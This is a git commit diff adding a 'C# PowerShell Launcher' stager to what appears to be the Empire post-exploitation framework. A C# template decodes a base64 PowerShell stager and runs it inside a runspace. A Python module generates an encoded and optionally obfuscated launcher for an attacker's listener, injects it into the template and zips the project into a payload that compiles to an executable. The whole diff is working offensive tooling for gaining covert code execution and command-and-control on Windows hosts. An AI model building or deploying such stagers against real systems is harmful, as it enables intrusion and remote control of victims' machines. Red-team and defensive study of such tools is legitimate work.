Merge pull request #949 from elitest/empire-cs

Add support for C# launcher
2018-02-08 21:57:43 -05:00 · 2018-02-08 21:57:43 -05:00 · 683bca8bcc
parent ceb9af77b8 94ceb0df58
commit 683bca8bcc
7 changed files with 267 additions and 0 deletions
--- a/data/misc/cSharpTemplateResources/cmd/cmd.sln
+++ b/data/misc/cSharpTemplateResources/cmd/cmd.sln
@ -0,0 +1,18 @@
+
+Microsoft Visual Studio Solution File, Format Version 11.00
+# Visual Studio 2010
+# SharpDevelop 4.4
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "cmd", "cmd\cmd.csproj", "{6DC4D341-0ADB-45A2-BF10-EF7B7E93A157}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{6DC4D341-0ADB-45A2-BF10-EF7B7E93A157}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{6DC4D341-0ADB-45A2-BF10-EF7B7E93A157}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{6DC4D341-0ADB-45A2-BF10-EF7B7E93A157}.Release|Any CPU.Build.0 = Release|Any CPU
+		{6DC4D341-0ADB-45A2-BF10-EF7B7E93A157}.Release|Any CPU.ActiveCfg = Release|Any CPU
+	EndGlobalSection
+EndGlobal
--- a/data/misc/cSharpTemplateResources/cmd/cmd/Program.cs
+++ b/data/misc/cSharpTemplateResources/cmd/cmd/Program.cs
@ -0,0 +1,34 @@
+/*
+ * 
+ * You may compile this in Visual Studio or SharpDevelop etc.
+ * 
+ * 
+ * 
+ * 
+ */
+using System;
+using System.Text;
+using System.Management.Automation; 
+using System.Management.Automation.Runspaces; 
+
+namespace cmd
+{
+	class Program
+	{
+		public static void Main(string[] args)
+		{
+			string stager = " YOUR CODE GOES HERE";
+			var decodedScript = Encoding.Unicode.GetString(Convert.FromBase64String(stager));
+
+            Runspace runspace = RunspaceFactory.CreateRunspace();
+            runspace.Open();
+            RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
+            Pipeline pipeline = runspace.CreatePipeline();
+
+            pipeline.Commands.AddScript(decodedScript);
+
+            pipeline.Commands.Add("Out-String");
+            pipeline.Invoke();
+        }
+	}
+}
--- a/data/misc/cSharpTemplateResources/cmd/cmd/Properties/AssemblyInfo.cs
+++ b/data/misc/cSharpTemplateResources/cmd/cmd/Properties/AssemblyInfo.cs
@ -0,0 +1,31 @@
+#region Using directives
+
+using System;
+using System.Reflection;
+using System.Runtime.InteropServices;
+
+#endregion
+
+// General Information about an assembly is controlled through the following 
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("cmd")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("cmd")]
+[assembly: AssemblyCopyright("Copyright 2018")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// This sets the default COM visibility of types in the assembly to invisible.
+// If you need to expose a type to COM, use [ComVisible(true)] on that type.
+[assembly: ComVisible(false)]
+
+// The assembly version has following format :
+//
+// Major.Minor.Build.Revision
+//
+// You can specify all the values or you can use the default the Revision and 
+// Build Numbers by using the '*' as shown below:
+[assembly: AssemblyVersion("1.0.*")]
--- a/data/misc/cSharpTemplateResources/cmd/cmd/app.config
+++ b/data/misc/cSharpTemplateResources/cmd/cmd/app.config
@ -0,0 +1,3 @@
+<?xml version="1.0" encoding="utf-8"?>
+<configuration>
+<startup><supportedRuntime version="v2.0.50727"/></startup></configuration>
--- a/data/misc/cSharpTemplateResources/cmd/cmd/cmd.csproj
+++ b/data/misc/cSharpTemplateResources/cmd/cmd/cmd.csproj
@ -0,0 +1,49 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" DefaultTargets="Build">
+  <PropertyGroup>
+    <ProjectGuid>{6DC4D341-0ADB-45A2-BF10-EF7B7E93A157}</ProjectGuid>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <OutputType>WinExe</OutputType>
+    <RootNamespace>cmd</RootNamespace>
+    <AssemblyName>cmd</AssemblyName>
+    <TargetFrameworkVersion>v2.0</TargetFrameworkVersion>
+    <TargetFrameworkProfile>
+    </TargetFrameworkProfile>
+    <AppDesignerFolder>Properties</AppDesignerFolder>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Platform)' == 'AnyCPU' ">
+    <PlatformTarget>x86</PlatformTarget>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)' == 'Debug' ">
+    <OutputPath>bin\Debug\</OutputPath>
+    <DebugSymbols>True</DebugSymbols>
+    <DebugType>Full</DebugType>
+    <Optimize>False</Optimize>
+    <CheckForOverflowUnderflow>True</CheckForOverflowUnderflow>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)' == 'Release' ">
+    <OutputPath>bin\Release\</OutputPath>
+    <DebugSymbols>False</DebugSymbols>
+    <DebugType>None</DebugType>
+    <Optimize>True</Optimize>
+    <CheckForOverflowUnderflow>False</CheckForOverflowUnderflow>
+    <DefineConstants>TRACE</DefineConstants>
+  </PropertyGroup>
+  <PropertyGroup>
+    <StartupObject />
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="System" />
+    <Reference Include="System.Management.Automation" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="Program.cs" />
+    <Compile Include="Properties\AssemblyInfo.cs" />
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="app.config" />
+  </ItemGroup>
+  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+</Project>
--- a/lib/stagers/windows/csharp_exe.py
+++ b/lib/stagers/windows/csharp_exe.py
@ -0,0 +1,132 @@
+from lib.common import helpers
+import shutil
+
+class Stager:
+
+    def __init__(self, mainMenu, params=[]):
+
+        self.info = {
+            'Name': 'C# PowerShell Launcher',
+
+            'Author': ['@elitest'],
+
+            'Description': ('Generate a PowerShell C#  solution with embedded stager code that compiles to an exe'),
+
+            'Comments': [
+                'Based on the work of @bneg'
+            ]
+        }
+
+        # any options needed by the stager, settable during runtime
+        self.options = {
+            # format:
+            #   value_name : {description, required, default_value}
+            'Listener' : {
+                'Description'   :   'Listener to generate stager for.',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'Language' : {
+                'Description'   :   'Language of the stager to generate.',
+                'Required'      :   True,
+                'Value'         :   'powershell'
+            },
+            'Listener' : {
+                'Description'   :   'Listener to use.',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'StagerRetries' : {
+                'Description'   :   'Times for the stager to retry connecting.',
+                'Required'      :   False,
+                'Value'         :   '0'
+            },
+            'UserAgent' : {
+                'Description'   :   'User-agent string to use for the staging request (default, none, or other).',
+                'Required'      :   False,
+                'Value'         :   'default'
+            },
+            'Proxy' : {
+                'Description'   :   'Proxy to use for request (default, none, or other).',
+                'Required'      :   False,
+                'Value'         :   'default'
+            },
+            'ProxyCreds' : {
+                'Description'   :   'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
+                'Required'      :   False,
+                'Value'         :   'default'
+            },
+            'OutFile' : {
+                'Description'   :   'File to output zip to.',
+                'Required'      :   True,
+                'Value'         :   '/tmp/launcher.src'
+            },
+            'Obfuscate' : {
+                'Description'   :   'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.',
+                'Required'      :   False,
+                'Value'         :   'False'
+            },
+            'ObfuscateCommand' : {
+                'Description'   :   'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
+                'Required'      :   False,
+                'Value'         :   r'Token\All\1'
+            }
+        }
+
+        # save off a copy of the mainMenu object to access external functionality
+        #   like listeners/agent handlers/etc.
+        self.mainMenu = mainMenu
+
+        for param in params:
+            # parameter format is [Name, Value]
+            option, value = param
+            if option in self.options:
+                self.options[option]['Value'] = value
+
+
+    def generate(self):
+
+        listenerName = self.options['Listener']['Value']
+
+        # staging options
+        language = self.options['Language']['Value']
+        userAgent = self.options['UserAgent']['Value']
+        proxy = self.options['Proxy']['Value']
+        proxyCreds = self.options['ProxyCreds']['Value']
+        stagerRetries = self.options['StagerRetries']['Value']
+        obfuscate = self.options['Obfuscate']['Value']
+        obfuscateCommand = self.options['ObfuscateCommand']['Value']
+        outfile = self.options['OutFile']['Value']
+
+        if not self.mainMenu.listeners.is_listener_valid(listenerName):
+            # not a valid listener, return nothing for the script
+            print helpers.color("[!] Invalid listener: " + listenerName)
+            return ""
+        else:
+            obfuscateScript = False
+            if obfuscate.lower() == "true":
+                obfuscateScript = True
+
+            if obfuscateScript and "launcher" in obfuscateCommand.lower():
+                print helpers.color("[!] If using obfuscation, LAUNCHER obfuscation cannot be used in the C# stager.")
+                return ""
+            # generate the PowerShell one-liner with all of the proper options set
+            launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, obfuscate=obfuscateScript, obfuscationCommand=obfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
+
+            if launcher == "":
+                print helpers.color("[!] Error in launcher generation.")
+                return ""
+            else:
+                launcherCode = launcher.split(" ")[-1]
+
+                directory = self.mainMenu.installPath + "/data/misc/cSharpTemplateResources/cmd/"
+                destdirectory = "/tmp/cmd/"
+
+                shutil.copytree(directory,destdirectory)
+
+                lines = open(destdirectory + 'cmd/Program.cs').read().splitlines()
+                lines[19] = "\t\t\tstring stager = \"" + launcherCode + "\";"
+                open(destdirectory + 'cmd/Program.cs','w').write('\n'.join(lines))
+                shutil.make_archive(outfile,'zip',destdirectory)
+                shutil.rmtree(destdirectory)
+                return outfile
--- a/setup/setup_database.py
+++ b/setup/setup_database.py